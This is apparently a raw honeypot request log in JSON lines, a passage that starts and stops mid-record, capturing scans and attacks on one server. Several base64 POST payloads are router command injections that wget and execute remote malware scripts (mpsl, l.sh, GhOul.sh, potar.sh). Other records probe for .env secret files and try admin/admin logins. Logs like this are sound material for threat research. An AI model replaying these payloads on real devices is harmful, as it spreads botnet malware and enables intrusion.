"HTTP/1.1"} +{"ip": "84.54.51.192", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.193", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "84.247.95.4", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "84.247.95.4", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "84.247.95.4", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "84.247.95.4", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "35.203.211.100", "Host": "116.202.22.148:80", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "193.42.33.176", "Accept": "Application/json, */*", "Connection": "Keep-Alive", "Content_Length": "29", "Content_Type": "Application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36", "Method": "POST", "Path": "/login", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcGFzc3dvcmQ9YWRtaW4NCg=="} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "5.188.210.227", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Cache_Control": "no-cache", "Connection": "close", "Content_Length": "0", "Cookie": "cookie=ok", "Host": "5.188.210.227", "Pragma": "no-cache", "Referer": "https://www.google.com/", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Method": "GET", "Path": "http://5.188.210.227/echo.php", "Http_Version": "HTTP/1.1"} +{"ip": "75.107.129.176", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "141.95.148.71", "Host": "blog.cloudflare.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "blog.cloudflare.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "87.236.176.214", "Accept": "*/*", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/wordpress/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/wp/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/blog/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/old/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/new/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/test/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/backup/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/temp/", "Http_Version": "HTTP/1.1"} +{"ip": "194.163.155.246", "Accept_Encoding": "gzip,deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "87.236.176.107", "Accept": "*/*", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.236.10", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/portal/redlion", "Http_Version": "HTTP/1.1"} +{"ip": "182.42.111.213", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "156.199.86.172", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTt3Z2V0IGh0dHA6Ly85NC4xNTYuNi45Ny9tcHNsOyBjaG1vZCA3NzcgbXBzbDsgLi9tcHNsIGxibGluay5zZWxmcmVwOw0KDQo="} +{"ip": "178.238.238.29", "Method": "GET", "Path": "/w00tw00t.at.ISC.SANS.DFind:)", "Http_Version": "HTTP/1.1"} +{"ip": "178.238.238.29", "Method": "GET", "Path": "/w00tw00t.at.ISC.SANS.DFind:)", "Http_Version": "HTTP/1.1"} +{"ip": "78.108.177.52", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "103.56.61.144", "Accept": "text/html,application/xhtml+xml,application/xml", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "103.56.61.144", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "103.56.61.144", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "103.56.61.144", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "34.76.158.233", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "15167701668329799023", "x-datadog-parent-id": "1132017756926614960", "x-datadog-sampling-priority": "1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.192", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.193", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "118.194.236.142", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.194.236.142", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "118.194.236.142", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "118.194.236.142", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "118.194.236.142", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "198.199.114.47", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "47.197.157.168", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "120.63.180.123", "Content_Type": "application/x-www-form-urlencoded", "Method": "POST", "Path": "/cgi-bin/luci/;stok=/locale?form=country", "Http_Version": "HTTP/1.1", "POST_Payload": "b3BlcmF0aW9uPXdyaXRlJmNvdW50cnk9JCh3Z2V0IGh0dHA6Ly8xOTQuMTgwLjQ4LjEwMC9sLnNoICYmIHNoIGwuc2g+L3RtcC9vdXQpDQoNCg=="} +{"ip": "120.63.180.123", "Content_Type": "application/x-www-form-urlencoded", "Method": "POST", "Path": "/cgi-bin/luci/;stok=/locale?form=country", "Http_Version": "HTTP/1.1", "POST_Payload": "b3BlcmF0aW9uPXdyaXRlJmNvdW50cnk9JCh3Z2V0IGh0dHA6Ly8xOTQuMTgwLjQ4LjEwMC9sLnNoICYmIHNoIGwuc2g+L3RtcC9vdXQpDQoNCg=="} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "5.188.210.227", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Cache_Control": "no-cache", "Connection": "close", "Content_Length": "0", "Cookie": "cookie=ok", "Host": "5.188.210.227", "Pragma": "no-cache", "Referer": "https://www.google.com/", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Method": "GET", "Path": "http://5.188.210.227/echo.php", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "96.127.174.90", "Accept_Encoding": "gzip", "Content_Length": "430", "Cookie": "user=admin", "Host": "116.202.22.148:8080", "User_Agent": "Go-http-client/1.1", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTtjZCAvdG1wIGNkIC92YXIvcnVuIGNkIC9tbnQgY2QgL3Jvb3QgY2QgLzsgd2dldCBodHRwOi8vODYuMTA3LjE3OS4yMzQvR2hPdWwuc2g7IGNobW9kIDc3NyBHaE91bC5zaDsgc2ggR2hPdWwuc2g7IHRmdHAgODYuMTA3LjE3OS4yMzQgLWMgZ2V0IHRmdHAxLnNoOyBjaG1vZCA3NzcgdGZ0cDEuc2g7IHNoIHRmdHAxLnNoOyB0ZnRwIC1yIHRmdHAyLnNoIC1nIDg2LjEwNy4xNzkuMjM0OyBjaG1vZCA3NzcgdGZ0cDIuc2g7IHNoIHRmdHAyLnNoOyBmdHBnZXQgLXYgLXUgYW5vbnltb3VzIC1wIGFub255bW91cyAtUCAyMSA4Ni4xMDcuMTc5LjIzNCBmdHAxLnNoIGZ0cDEuc2g7IHNoIGZ0cDEuc2g7IHJtIC1yZiBHaE91bC5zaCB0ZnRwMS5zaCB0ZnRwMi5zaCBmdHAxLnNoOyBybSAtcmYgKg=="} +{"ip": "95.214.55.115", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded", "Host": "127.0.0.1:8088", "Origin": "http://127.0.0.1:8088", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "95.214.55.115", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Authorization": "Basic YWRtaW46YWRtaW4=", "Content_Length": "373", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:8080", "Origin": "http://127.0.0.1:8088", "Referer": "http://116.202.22.148:8080/apply.cgi", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "POST", "Path": "/apply.cgi", "Http_Version": "HTTP/1.1", "POST_Payload": "YWN0aW9uPUFwcGx5VGFrZSZjaGFuZ2VfYWN0aW9uPWdvemlsYV9jZ2kmZGVsX3ZhbHVlPSZob3N0PWh0dHAlM0ElMkYlMkYxMjcuMC4wLjElM0E4MDg4Jm5leHRfcGFnZT1EaWFnbm9zdGljcy5hc3AmcGluZ19pcD1jZCslMkZ0bXAlM0J3Z2V0K2h0dHAlM0ElMkYlMkY0NS44OC45MC4xMTMlMkZzZHhrelhfVVhBMjI5eC5tcHNsKy1PK21mdSUzQmNobW9kKzc3NyttZnUlM0IuJTJGbWZ1K2ZhaXRoJTNCK3JtKy1yZittZnUlM0Ird2dldCtodHRwJTNBJTJGJTJGNDUuODguOTAuMTEzJTJGc2R4a3pYX1VYQTIyOXgubXBzbCstTyttZnUlM0JjaG1vZCs3NzcrbWZ1JTNCLiUyRm1mdSttZW93JTNCJnN1Ym1pdF9idXR0b249UGluZyZzdWJtaXRfdHlwZT1zdGFydA=="} +{"ip": "34.77.127.183", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "6106143377693262128", "x-datadog-parent-id": "5455777551304737972", "x-datadog-sampling-priority": "1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "78.108.177.50", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "165.232.177.124", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "38.7.199.228", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.230.41", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "104.248.143.84", "Accept": "*/*", "Accept_Charset": "UTF-8", "Accept_Encoding": "UTF-8", "Accept_Language": "*", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.145", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.142.182.101", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.142.182.101", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "196", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "User_Agent": "Mozila/5.0", "Method": "POST", "Path": "/web_shell_cmd.gch", "Http_Version": "HTTP/1.1", "POST_Payload": "SUZfQUNUSU9OPWFwcGx5JklGX0VSUk9SU1RSPVNVQ0MmSUZfRVJST1JQQVJBTT1TVUNDJklGX0VSUk9SVFlQRT0tMSZDbWQ9Y2QrJTJGdG1wJTNCd2dldCtodHRwJTNBJTJGJTJGaW50ZXJwb2wud3MlMkZmdWV6JTJGcG90YXIuc2glM0JjaG1vZCs3NzcrcG90YXIuc2glM0JzaCtwb3Rhci5zaCt6dGUlM0JybSstcmYrcG90YXIuc2gmQ21kQWNrPQ0KDQo="} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/CSS/Miniweb.css", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/CSS/Miniweb.css", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/Portal0000.htm", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Host": "www.google.com", "Method": "GET", "Path": "http://www.google.com", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/nmaplowercheck1697944354", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Content_Length": "441", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "POST", "Path": "/sdk", "Http_Version": "HTTP/1.1", "POST_Payload": "PHNvYXA6RW52ZWxvcGUgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6c29hcD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPjxzb2FwOkhlYWRlcj48b3BlcmF0aW9uSUQ+MDAwMDAwMDEtMDAwMDAwMDE8L29wZXJhdGlvbklEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48UmV0cmlldmVTZXJ2aWNlQ29udGVudCB4bWxucz0idXJuOmludGVybmFsdmltMjUiPjxfdGhpcyB4c2k6dHlwZT0iTWFuYWdlZE9iamVjdFJlZmVyZW5jZSIgdHlwZT0iU2VydmljZUluc3RhbmNlIj5TZXJ2aWNlSW5zdGFuY2U8L190aGlzPjwvUmV0cmlldmVTZXJ2aWNlQ29udGVudD48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} +{"ip": "109.74.204.123", "Connection": "close", "Content_Length": "441", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "POST", "Path": "/sdk", "Http_Version": "HTTP/1.1", "POST_Payload": "PHNvYXA6RW52ZWxvcGUgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6c29hcD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPjxzb2FwOkhlYWRlcj48b3BlcmF0aW9uSUQ+MDAwMDAwMDEtMDAwMDAwMDE8L29wZXJhdGlvbklEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48UmV0cmlldmVTZXJ2aWNlQ29udGVudCB4bWxucz0idXJuOmludGVybmFsdmltMjUiPjxfdGhpcyB4c2k6dHlwZT0iTWFuYWdlZE9iamVjdFJlZmVyZW5jZSIgdHlwZT0iU2VydmljZUluc3RhbmNlIj5TZXJ2aWNlSW5zdGFuY2U8L190aGlzPjwvUmV0cmlldmVTZXJ2aWNlQ29udGVudD48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/nmaplowercheck1697944355", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Host": "www.google.com", "Method": "HEAD", "Path": "http://www.google.com", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/__Additional", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/pools/default/buckets", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": 